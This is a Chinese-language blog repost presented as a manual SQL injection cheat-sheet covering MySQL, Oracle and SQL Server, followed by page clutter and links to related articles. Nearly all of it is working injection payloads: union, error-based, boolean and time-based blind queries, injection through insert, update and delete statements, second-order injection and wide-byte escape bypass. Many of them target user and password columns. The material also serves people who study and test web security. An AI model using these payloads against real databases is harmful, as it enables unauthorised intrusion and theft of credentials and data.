全网最全的SQL手工注入总结!(收藏这篇就够了!)

最新推荐文章于 2024-06-20 17:07:42 发布
最新推荐文章于 2024-06-20 17:07:42 发布
阅读量3.5k 收藏 19
点赞数 2
分类专栏: SQL入门到入魔 文章标签: 字符串 mysql 数据库 sql 网络安全
原文链接:https://mp.weixin.qq.com/s?__biz=MzAwMjA5OTY5Ng==&mid=2247494755&idx=1&sn=f9b5d3c796a5d4219acd8f5880a7cb50
版权

全文最全的SQL手工注入总结(收藏这篇就够了)

 

虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正!

0x01 Mysql 手工注入

1.1 联合注入

 

?id=1' order by 4--+
?id=0' union select 1,2,3,database()--+
?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+
#group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name


?id=0' union select 1,2,3,group_concat(password) from users --+
#group_concat 可替换为 concat_ws(',',id,users,password )


?id=0' union select 1,2,3,password from users limit 0,1--+

1.2 报错注入

 

1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);


2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));


3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));


4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));


5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));


6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));


7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));


8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));


9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));


10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

每个一个报错语句都有它的原理:

exp() 报错的原理:exp 是一个数学函数,取e的x次方,当我们输入的值大于709就会报错,然后 ~ 取反它的值总会大于709,所以报错。

updatexml() 报错的原理:由于 updatexml 的第二个参数需要 Xpath 格式的字符串,以 ~ 开头的内容不是 xml 格式的语法,concat() 函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了。

 

爆库:?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +
爆表:?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +
爆字段:?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +
爆数据:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +


#concat 也可以放在外面 updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)

这里需要注意的是它加了连接字符,导致数据中的 md5 只能爆出 31 位,这里可以用分割函数分割出来:

 

substr(string string,num start,num length);
#string为字符串,start为起始位置,length为长度


?id=1' and updatexml(1,concat(0x7e, substr((select password from users limit 1,1),1,16),0x7e),1) -- +

1.3 盲注

1.3.1 时间盲注

时间盲注也叫延时注入 一般用到函数 sleep() BENCHMARK() 还可以使用笛卡尔积(尽量不要使用,内容太多会很慢很慢)

一般时间盲注我们还需要使用条件判断函数

#if(expre1,expre2,expre3)
当 expre1 为 true 时,返回 expre2,false 时,返回 expre3


#盲注的同时也配合着 mysql 提供的分割函
substr、substring、left

我们一般喜欢把分割的函数编码一下,当然不编码也行,编码的好处就是可以不用引号,常用到的就有 ascii() hex() 等等

 

?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+
?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+

1.3.2 布尔盲注

?id=1' and substr((select user()),1,1)='r' -- +
?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +
#如果 IFNULL 第一个参数的表达式为 NULL,则返回第二个参数的备用值,不为 Null 则输出值


?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +
#若所有的字符串均相同,STRCMP() 返回 0,若根据当前分类次序,第一个参数小于第二个,则返回 -1 ,其它情况返回 1

 

1.4 insert,delete,update

insert,delete,update 主要是用到盲注和报错注入,此类注入点不建议使用 sqlmap 等工具,会造成大量垃圾数据,一般这种注入会出现在 注册、ip头、留言板等等需要写入数据的地方,同时这种注入不报错一般较难发现,我们可以尝试性插入、引号、双引号、转义符 \ 让语句不能正常执行,然后如果插入失败,更新失败,然后深入测试确定是否存在注入

 

1.4.1 报错

mysql> insert into admin (id,username,password) values (2,"or updatexml(1,concat(0x7e,(version())),0) or","admin");
Query OK, 1 row affected (0.00 sec)


mysql> select * from admin;
+------+-----------------------------------------------+----------+
| id   | username                                      | password |
+------+-----------------------------------------------+----------+
|    1 | admin                                         | admin    |
|    1 | and 1=1                                       | admin    |
|    2 | or updatexml(1,concat(0x7e,(version())),0) or | admin    |
+------+-----------------------------------------------+----------+
3 rows in set (0.00 sec)


mysql> insert into admin (id,username,password) values (2,""or updatexml(1,concat(0x7e,(version())),0) or"","admin");
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'


#delete 注入很危险,很危险,很危险,切记不能使用 or 1=1 ,or 右边一定要为false
mysql> delete from admin where id =-2 or updatexml(1,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'

 

1.4.2 盲注

#int型 可以使用 运算符 比如 加减乘除 and or 异或 移位等等
mysql> insert into admin values (2+if((substr((select user()),1,1)='r'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (5.00 sec)


mysql> insert into admin values (2+if((substr((select user()),1,1)='p'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (0.00 sec)


#字符型注意闭合不能使用and
mysql> insert into admin values (2,''+if((substr((select user()),1,1)='p'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (0.00 sec)


mysql> insert into admin values (2,''+if((substr((select user()),1,1)='r'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (5.01 sec)


# delete 函数 or 右边一定要为 false
mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r4'),sleep(5),0);
Query OK, 0 rows affected (0.00 sec)


mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r'),sleep(5),0);
Query OK, 0 rows affected (5.00 sec)


#update 更新数据内容
mysql> select * from admin;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    2 | 1        | admin    |
|    2 | 1        | admin    |
|    2 | 1        | admin    |
|    2 | admin    | admin    |
+------+----------+----------+
4 rows in set (0.00 sec)


mysql> update admin set id="5"+sleep(5)+"" where id=2;
Query OK, 4 rows affected (20.00 sec)
Rows matched: 4  Changed: 4  Warnings: 0

 

1.5 二次注入与宽字节注入

二次注入的语句:在没有被单引号包裹的sql语句下,我们可以用16进制编码它,这样就不会带有单引号等。

 

mysql> insert into admin (id,name,pass) values ('3',0x61646d696e272d2d2b,'11');
Query OK, 1 row affected (0.00 sec)


mysql> select * from admin;
+----+-----------+-------+
| id | name      | pass  |
+----+-----------+-------+
|  1 | admin     | admin |
|  2 | admin'111 | 11111 |
|  3 | admin'--+ | 11    |
+----+-----------+-------+
4 rows in set (0.00 sec)

 

二次注入在没有源码的情况比较难发现,通常见于注册,登录恶意账户后,数据库可能会因为恶意账户名的问题,将 admin'--+ 误认为 admin 账户

 

宽字节注入:针对目标做了一定的防护,单引号转变为 \' , mysql 会将 \ 编码为 %5c ,宽字节中两个字节代表一个汉字,所以把 %df 加上 %5c 就变成了一个汉字“運”,使用这种方法成功绕过转义,就是所谓的宽字节注入

 

id=-1%df' union select...


#没使用宽字节
%27 -> %5C%27


#使用宽字节
%df%27 -> %df%5c%27 -> 運'

 

0x02 Oracle 手工注入

2.1 联合注入

?id=-1' union select user,null from dual--
?id=-1' union select version,null from v$instance--
?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--
?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)--
?id=-1' union select username,passwd from users--
?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--

 

2.2 报错注入

?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--

 

2.3 盲注

2.3.1 布尔盲注

既然是盲注,那么肯定涉及到条件判断语句,Oracle除了使用IF the else end if这种复杂的,还可以使用 decode() 函数。
语法:decode(条件,值1,返回值1,值2,返回值2,...值n,返回值n,缺省值);

该函数的含义如下:

IF 条件=值1 THEN
    RETURN(返回值1)
ELSIF 条件=值2 THEN
    RETURN(返回值2)
    ......
ELSIF 条件=值n THEN
    RETURN(返回值n)
ELSE
    RETURN(缺省值)
END IF
?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--
?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--
?id=1' and ascii(substr(user,1,1))> 64--  #二分法

 

2.3.2 时间盲注

可使用DBMS_PIPE.RECEIVE_MESSAGE('任意值',延迟时间)函数进行时间盲注,这个函数可以指定延迟的时间

?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

 

0x03 SQL server 手工注入

3.1 联合注入

 

?id=-1' union select null,null--
?id=-1' union select @@servername, @@version--
?id=-1' union select db_name(),suser_sname()--
?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--
?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null--
?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--
?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null---
?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--

3.2 报错注入

 

?id=1' and 1=(select 1/@@servername)--
?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--

3.3 盲注

3.3.1 布尔盲注

 

?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--

3.3.2 时间盲注

 
?id= 1';if(2>1) waitfor delay '0:0:5'--
?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) waitfor delay '0:0:2'--

另外需要SQL学习书籍资料(高清全彩PDF)的朋友请关注+转发 私信【SQL】获取资料

我是黑客
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql手工注入实战
mulincong的博客
05-30 2259
sql手工注入封神台靶场
Mysql手工注入
09-16
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
手工SQL注入流程与常用语句_sql注入 手工(3),2024年最新看这篇文章准没错
2401_83974199的博客
04-16 536
如下代码和截图所示,展示了获取数据库中表的信息,information_schema是MySql自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等,其中的表实际上都是视图。进一步获取其中的字段名,假设要获取的表为users,如下面的代码和截图所示。information_schema的columns表存储了表中列的信息,也就是表中字段信息,指定table_name表名,即可获取到对应表的字段信息。是要截取的字符串,b是截取的位置,c是截取的长度。
细说——SQL注入的常见方式
LainWith的博客
11-04 7204
目录BurpSuite预配置1. 安装CO22. 配置CO23. 小试牛刀使用pikachu靶场的“字符型注入”联合查询(union)函数介绍order byunion selectlimit操作报错盲注1. 获取数据库名2. 获取敏感信息3.获取 mysql 账号密码其他报错函数4. 获取表名4.1 获取第一张表4.2 获取第二张表4.3 获取所有表5. 获取列5.1 获取第一列5.2 获取第二列5.3 获取所有列6. 获取列中的数据6.1 获取第一组数据6.2 获取第二组数据6.3 获取所有数据布尔盲注
手工操作几种常见SQL注入
最新发布
X1DD1Asad343的博客
06-20 865
是一种结合数据库原始报错信息和union查询的注入方式使用场景:数据库中查询的结果能直接在前端页面中展示出来。
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1861
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
MySQL手工注入
xiao_he0123的博客
03-16 3476
MySQL手工注入基本知识前言一、SQL注入的原理二,如何判断是否有注入点三、步骤1.MySQL信息收集2.数据注入四,案例演示1.判断是否有注入点2.确认字段数3.判断回显点4.查询相关内容1查询库名2.查询版本号3.查询数据库表名4.查询列名信息5.查询具体数据 前言 此次文章建立在MySQL数据库的基础上 一、SQL注入的原理 可控变量带入数据库查询,变量未存在过滤或者过滤不完整 二,如何判断是否有注入点 and 1=1页面正常 and 1=2页面错误则表明有注入点 同时也可以对参数随意赋值判断如果
Mysql 手工注入
weixin_45625450的博客
09-14 778
p=1&id=4’ and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=‘表名’ #x%’ and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9,…
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2492
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql手工注入
admin的博客
10-27 813
按照数据提交的方式来分类 友情链接:https://www.cnblogs.com/-chenxs/p/11614129.html、https://www.cnblogs.com/p0pl4r/p/10320631.html (1)GET 注入 提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?id=1 , id 是注入点。 (2)POST 注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。
SQL 注入 五大基本手法
weixin_51559599的博客
11-07 994
适用数据库中的来的情况。联合查询就是利用语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。
全网最全Appium自动化测试教程,一篇就
05-22
全网最全Appium自动化测试教程,一篇就了 Appium是开源的、跨平台的测试自动化测试框架; 主要用于测试移动端应用; Appium支持模拟器和真机上的原生应用、混合应用、Web应用; Appium使用WebDriver的JSON wire...
全网最全appium环境安装说明教程,一篇就
05-22
全网最全appium环境安装说明教程,一篇就了,史上最详细
全网最全数据分析师面试干货-sql篇1
08-03
SQL篇1】数据分析师面试知识点详解 在数据分析师的面试中,SQL是不可或缺的技能之一,本篇文章将深入探讨一些SQL的高频考点,帮助你在面试中脱颖而出。 1. SQL开窗函数/窗口函数 开窗函数,如`row_number()`, `...
数据安全标准 数据安全行业相关标准清单列表(全网最全!!!)
05-23
全网最全数据安全相关标准清单!!!!让你做数据安全或提供数据安全服务时快速了解相关标准!!!! 本清单包含数据安全五个方面的行业标准 1.重要计划标准(5项) 2.国家标准(26项) 3.行业标准(28项) 4.地方...
火爆全网全网最强GPT-AI助手上线!!!
04-19
总结来看,这个GPT-AI助手是人工智能领域的热点,它结合了GPT技术的先进性,可能提供了一种高度智能化、用户友好的交互方式。通过阅读提供的文档,我们可以深入了解这款助手的运作机制、优势以及如何在日常工作中...
温泉PHP网络授权系统,温泉PHP授权系统验证系统完整开源
weixin_31458015的博客
03-10 2612
安装说明1.导入文件 “wenquan_auth.sql” 到您的数据库中导入完成后请务必删除数据库文件2.修改配置文件 “function/config.inc.php” 文件中的信息为您的数据库信息3.通过执行以下代码新增管理员(请自行将各项参数替换):INSERT INTO sq_admin (ID, username, password, loginip, logintime, qq,...
SQL注入(四)手工注入攻击步骤
热门推荐
pumpkin9
05-05 4万+
以bugkuctf平台的一道题为例:链接http://120.24.86.145:8002/chengjidan/ 0)首先测试正常数据。 链接的结尾添加【?id=1(数字任意)】 1) 判断是否存在注入点; 【?id=32(数字任意)】链接的结尾依次添加语句【‘】、【and 1=1】和【and 1=2】,来判断网站是否存在注入点。尝试在正常数据后加上单引号,发现数据为空,加...
python办公自动化之excel做表自动化:全网最全,看这一篇就
01-31
Python是一种功能强大的编程语言,可以被用于办公自动化,其中包括Excel表格的自动化处理。下面我们将详细介绍如何使用Python实现Excel表格的自动化处理。 Python的第三方库openpyxl可以用于处理Excel文件。首先,我们需要安装openpyxl库,可以通过pip命令进行安装。安装完成后,我们可以使用openpyxl库中的函数和方法进行Excel表格的读取、写入和修改。 读取Excel文件非常简单,我们可以使用openpyxl库的load_workbook函数,指定要读取的文件路径,然后使用get_sheet_by_name函数选择要操作的工作表。这样,我们就可以使用cell函数来获取特定单元格的值。 写入和修改Excel文件也很容易。我们可以使用openpyxl库的Workbook函数创建一个新的Excel文件,然后使用create_sheet函数添加工作表。对于已经存在的Excel文件,我们可以使用Workbook的load_workbook函数打开文件,然后可以对工作表进行操作,例如使用cell函数来写入数据或修改单元格的值。 除了基本的读取、写入和修改操作,Python还可以进行更复杂的Excel表格自动化处理。我们可以根据条件筛选数据、合并或拆分单元格、插入和删除行列、设置单元格的格式等。 在实际的办公自动化应用中,Python的openpyxl库配合其他功能强大的库如pandas、numpy等,可以实现更多高级操作。同时,我们还可以使用Python库比如xlwings从Excel中调用Python代码,进一步提高Excel表格的自动化处理能力。 总而言之,Python可以通过openpyxl库实现Excel表格的自动化处理。通过读取、写入和修改单元格,我们可以实现数据的快速处理和分析。此外,Python还能进行更复杂的Excel操作,为办公自动化带来更多便利。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值